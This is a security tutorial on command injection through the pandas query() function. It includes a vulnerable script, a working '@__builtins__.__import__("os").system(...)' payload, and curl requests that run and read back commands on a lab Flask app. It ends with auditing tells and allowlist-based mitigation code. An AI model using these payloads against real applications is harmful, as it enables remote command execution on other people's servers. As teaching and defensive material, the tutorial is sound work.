PyFu

Python Pandas Library Arbitrary Command Execution

Python-based Web Application Attacks

The pandas library is one of the most widely used data manipulation tools in the Python ecosystem, particularly in data science, analytics, and backend services that process tabular data.

Pandas is a third-party library, not part of the Python standard library, and it is commonly used in web APIs, automation tools, and data platforms.

One of its features, query(), allows users to filter rows based on logical expressions written as strings.
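For reference, intended use looks roughly like the sketch below. The column names, values, and the min_age variable are made up for illustration. Note the @min_age reference: @ pulls a variable from the calling scope into the expression, which is the same hook the payloads later on this page abuse.

```python
import pandas as pd

# Made-up data for illustration only.
df = pd.DataFrame({"name": ["alice", "bob", "carol"], "age": [34, 27, 41]})
min_age = 30

# query() parses the string as an expression over column names;
# "@min_age" resolves a variable from the calling scope.
adults = df.query("age > @min_age")

# The same filter written with plain boolean indexing: no string is evaluated.
same = df[df["age"] > min_age]

print(adults["name"].tolist())  # ['alice', 'carol']
```

Both forms return the same rows; only the first one hands a string to the expression parser.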

While powerful and convenient, this function can be dangerous if user input is passed directly into the query string, especially in applications that expose this functionality through APIs or form inputs.

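The reason is that query() does not treat its argument as a plain value: pandas parses the string as a Python expression and resolves the names, attribute lookups, and function calls it contains, including references to special objects like __builtins__. That makes it a potential vector for arbitrary command execution.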

If untrusted input reaches query() without proper sanitization, attackers can craft malicious payloads that inject arbitrary Python expressions.

This includes referencing dangerous names such as __builtins__, which exposes built-in functions like __import__ and, through it, any module, allowing the attacker to execute arbitrary code.

Pandas query() Exploitation

In the following example, an application reads a CSV file into a DataFrame and allows filtering rows based on a user-supplied name.

Instead of proper input handling, the user-controlled string is directly embedded inside the query() function call:

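import pandas as pd

df = pd.read_csv("./data.csv")
# target_name stands in for a user-supplied value, e.g. a request parameter
target_name = '(@__builtins__.__import__("os").system("id>/tmp/pwned")).__eq__(1)#'
# the user-controlled string becomes the entire query expression
results = df.query(f"{target_name}")
print(results)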

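The payload uses @, pandas' syntax for referencing variables in the calling scope, to reach __builtins__ and call __builtins__.__import__("os").system(), which gives arbitrary system command execution. The .__eq__(1) wrapper compares the exit status returned by system() with 1, so the injected text still has the shape of a filter expression, and the trailing # is there to comment out anything the application appends after the injected value.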

In this case, the payload runs id>/tmp/pwned, redirecting the output of the id command into a file for later retrieval.

hackpad :: PyFu/generic-py-fu/pandas-example » ls /tmp/pwned
ls: cannot access '/tmp/pwned': No such file or directory
hackpad :: PyFu/generic-py-fu/pandas-example 2 » python3 vulnerable-panda.py 
...
KeyError: 'False: boolean label can not be used without a boolean index'
hackpad :: PyFu/generic-py-fu/pandas-example 1 » cat /tmp/pwned
uid=1001(hacker) gid=1001(hacker) groups=1001(hacker),27(sudo),100(users),983(ollama)
hackpad :: PyFu/generic-py-fu/pandas-example » 

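The file exists after the run even though query() raised an exception. system() returned 0, so the comparison evaluated to False and pandas failed when it tried to use that scalar as a row label, but by then the command had already executed: pandas resolves @ references, attribute lookups, and function calls while parsing the expression string, before the result is used to index the DataFrame.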
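The parse-time behavior can be checked without running any system command. This sketch assumes a small made-up DataFrame and swaps os.system for a hypothetical harmless_marker() function that only records that it was called. The query still fails, but the call has already happened, so catching the exception does not undo anything.

```python
import pandas as pd

# Made-up data for illustration only.
df = pd.DataFrame({"name": ["alice", "bob"], "age": [34, 27]})
side_effects = []  # records whether the "injected" call ran


def harmless_marker():
    """Hypothetical stand-in for os.system(): it only records the call."""
    side_effects.append("called")
    return 0  # mimic os.system() returning a success exit status


try:
    # Same idea as the earlier payload, minus anything dangerous.
    df.query("@harmless_marker() == 1")
except Exception as exc:  # the filter itself fails...
    print("query raised", type(exc).__name__)

# ...but the function already ran while pandas was parsing the string.
print(side_effects)
```

This is the behavior a defender should expect from any error handler wrapped around query(): the exception arrives after the side effect, not instead of it.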

In real-world scenarios, the attacker must carefully craft and escape the payload to ensure it integrates into the query string without causing syntax errors and successfully triggers code evaluation.

Why pandas query() injection matters from an offensive security perspective

I treat a user-reachable df.query() as an eval in disguise, and that is exactly how I score it: arbitrary Python execution in the application process, which, on either engine, means full command execution under the service account. What makes it dangerous in practice is how innocuous it looks. The endpoint advertises itself as a data filter, the developer thinks they are passing a comparison expression, and the @ syntax plus __builtins__ quietly turns that filter into a shell. Even when the query then raises, the injected expression has already run, so a 400 response is not a sign the attack failed.

This shows up in analytics and reporting backends far more than people expect. The tells I audit for:

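  • df.query(user_string) or df.eval(user_string) with any request-derived value. The string is interpreted as an expression, not matched as a literal value, so concatenation, f-strings, and “filter expression” parameters are all equivalent here.
  • engine="python", or reliance on the default numexpr engine. numexpr is narrower, and pandas falls back to the Python evaluator when numexpr is not installed, but the engine is not the boundary that matters: pandas resolves @ references, attribute lookups, and calls while parsing the string, before any engine runs, which is why the default-engine example above still ran id.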
  • Search, filter, sort, and “advanced query” boxes over tabular data. Dashboards that let users type expressions against a DataFrame are the classic carrier, and they are often behind only a thin login.
  • Errors that leak evaluation. A KeyError or boolean-index complaint after I inject tells me the expression reached the evaluator, which is the same signal I use to confirm blind execution.

The defender takeaway: keep attacker input out of query() and eval() entirely and build the predicate server-side from an allowlist.

Proof of exploitation

Run the lab app (PyFuLabs/flask-fu/flask-pandas-rce). The q parameter goes straight into df.query(..., engine="python"), which evaluates Python. The first request runs id and writes it to disk; the query then errors, but the command has already executed:

curl -sG "http://pyfu.local/flask-fu/flask-pandas-rce/search" \
  --data-urlencode 'q=(@__builtins__.__import__("os").system("id>/tmp/pwned")).__eq__(1)#'
# -> HTTP 400 (pandas error); the command already ran

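Reading the file back through a second injected expression confirms execution. The popen() output comes back inside the JSON error message, and it shows the lab service running as root: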

curl -sG "http://pyfu.local/flask-fu/flask-pandas-rce/search" \
  --data-urlencode 'q=(@__builtins__.__import__("os").popen("cat /tmp/pwned").read())'
{
  "error": "'uid=0(root) gid=0(root) groups=0(root)\n'"
}

Mitigation

The fix is to keep user input out of df.query() and df.eval(), which expose a Python expression evaluator; do not pass attacker-controlled strings to them at all. If users must filter data, parse their input into a constrained, server-built predicate (a small allowlist of columns, operators, and literal values) and apply it with boolean indexing rather than handing the raw string to query(). Treat query() and eval() the same way you treat Python's built-in eval, because that is effectively what they are.
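A minimal sketch of the allowlist approach, assuming a dataset with name and age columns. ALLOWED_COLUMNS, ALLOWED_OPS, parse_filter, and apply_filter are hypothetical names for illustration. User input only ever selects entries from fixed tables or becomes a typed literal, and the mask is built with ordinary Series comparisons, so no string ever reaches an expression parser.

```python
import operator

# Hypothetical allowlists for a dataset with "name" and "age" columns.
ALLOWED_COLUMNS = {"name": str, "age": int}  # column -> type of its literal
ALLOWED_OPS = {
    "eq": operator.eq,
    "ne": operator.ne,
    "lt": operator.lt,
    "gt": operator.gt,
}


def parse_filter(column: str, op: str, raw_value: str) -> tuple[str, str, object]:
    """Validate raw user input into (column, op_name, typed_value) or raise ValueError."""
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"unknown column: {column!r}")
    if op not in ALLOWED_OPS:
        raise ValueError(f"unsupported operator: {op!r}")
    try:
        # The value is converted to a literal; it is never parsed as code.
        value = ALLOWED_COLUMNS[column](raw_value)
    except ValueError:
        raise ValueError(f"bad value for {column!r}") from None
    return column, op, value


def apply_filter(df, column: str, op: str, value):
    """Apply a validated predicate to a DataFrame with boolean indexing."""
    mask = ALLOWED_OPS[op](df[column], value)  # e.g. df["age"] > 30
    return df[mask]
```

For example, apply_filter(df, *parse_filter("age", "gt", "30")) returns the same rows as df[df["age"] > 30], while a query-style payload submitted as the value for name is just compared as a string and matches nothing.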